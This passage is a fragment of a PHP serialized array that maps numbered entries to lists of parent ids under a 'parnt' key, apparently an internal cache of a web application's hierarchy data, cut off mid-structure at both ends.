"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:556;a:2:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}}i:557;a:3:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:558;a:5:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:374;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:375;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:559;a:1:{i:83;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:130;i:1;i:0;i:2;i:1;}}}}i:560;a:2:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:257;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:257;i:1;i:0;i:2;i:1;}}}}i:561;a:3:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:170;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:562;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:563;a:5:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:182;i:1;i:0;i:2;i:1;}}}}i:564;a:20:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:69;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:71;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:72;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:73;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:74;i:1;i:0;i:2;i:3;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:75;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:76;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:39;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:77;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:79;i:1;i:0;i:2;i:1;}}}}i:565;a:6:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:80;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:81;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:81;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:82;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:83;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:84;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:85;i:1;i:0;i:2;i:3;}}}}i:566;a:5:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:86;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:87;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:87;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:87;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:88;i:1;i:0;i:2;i:1;}}}}i:567;a:8:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:376;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:377;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:377;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:378;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:130;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:379;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:380;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:381;i:1;i:0;i:2;i:3;}}}}i:568;a:6:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:382;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:383;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:383;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:384;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:385;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:386;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:387;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:388;i:1;i:0;i:2;i:3;}}}}i:569;a:2:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}}i:570;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:129;i:1;i:0;i:2;i:1;}}}}i:571;a:2:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:129;i:1;i:0;i:2;i:1;}}}}i:572;a:5:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:573;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:574;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:575;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:121;i:1;i:0;i:2;i:1;}}}}i:576;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:577;a:1:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:578;a:1:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:579;a:1:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:580;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:581;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:582;a:5:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:105;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:583;a:1:{i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}}i:584;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:389;i:1;i:0;i:2;i:1;}}}}i:585;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:94;i:1;i:0;i:2;i:1;}}}}i:586;a:8:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:129;i:1;i:0;i:2;i:1;}}}}i:587;a:1:{i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:588;a:8:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:589;a:1:{i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:220;i:1;i:0;i:2;i:1;}}}}i:590;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:591;a:6:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:197;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:592;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}}i:593;a:5:{i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:390;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:594;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}}i:595;a:2:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}}i:596;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:121;i:1;i:0;i:2;i:1;}}}}i:597;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:598;a:1:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:599;a:1:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:600;a:5:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}}i:601;a:21:{i:49;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:16;i:1;i:0;i:2;i:2;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:17;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:205;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:205;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:160;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:30;i:1;i:0;i:2;i:2;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:69;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:71;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:72;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:73;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:74;i:1;i:0;i:2;i:3;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:75;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:76;i:1;i:0;i:2;i:1;}}}}i:602;a:3:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:173;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:206;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:207;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:208;i:1;i:0;i:2;i:3;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:209;i:1;i:0;i:2;i:1;}}}}i:603;a:1:{i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:604;a:9:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:391;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:188;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:129;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:218;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:129;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:218;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:222;i:1;i:0;i:2;i:1;}}}}i:605;a:1:{i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:606;a:9:{i:19;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:392;i:1;i:0;i:2;i:1;}}}i:84;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:21;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}i:85;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}i:71;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:86;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:393;i:1;i:0;i:2;i:1;}}}i:87;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:394;i:1;i:0;i:2;i:1;}}}}i:607;a:1:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:395;i:1;i:0;i:2;i:1;}}}}i:608;a:1:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:396;i:1;i:0;i:2;i:1;}}}}i:609;a:1:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:397;i:1;i:0;i:2;i:1;}}}}i:610;a:1:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:398;i:1;i:0;i:2;i:1;}}}}i:611;a:1:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:399;i:1;i:0;i:2;i:1;}}}}i:612;a:14:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:400;i:1;i:0;i:2;i:1;}}}}i:613;a:5:{i:54;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:97;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:1;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:46;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:46;i:1;i:0;i:2;i:1;}}}i:37;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:614;a:18:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:401;i:1;i:0;i:2;i:1;}}}i:54;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:1;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:37;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i: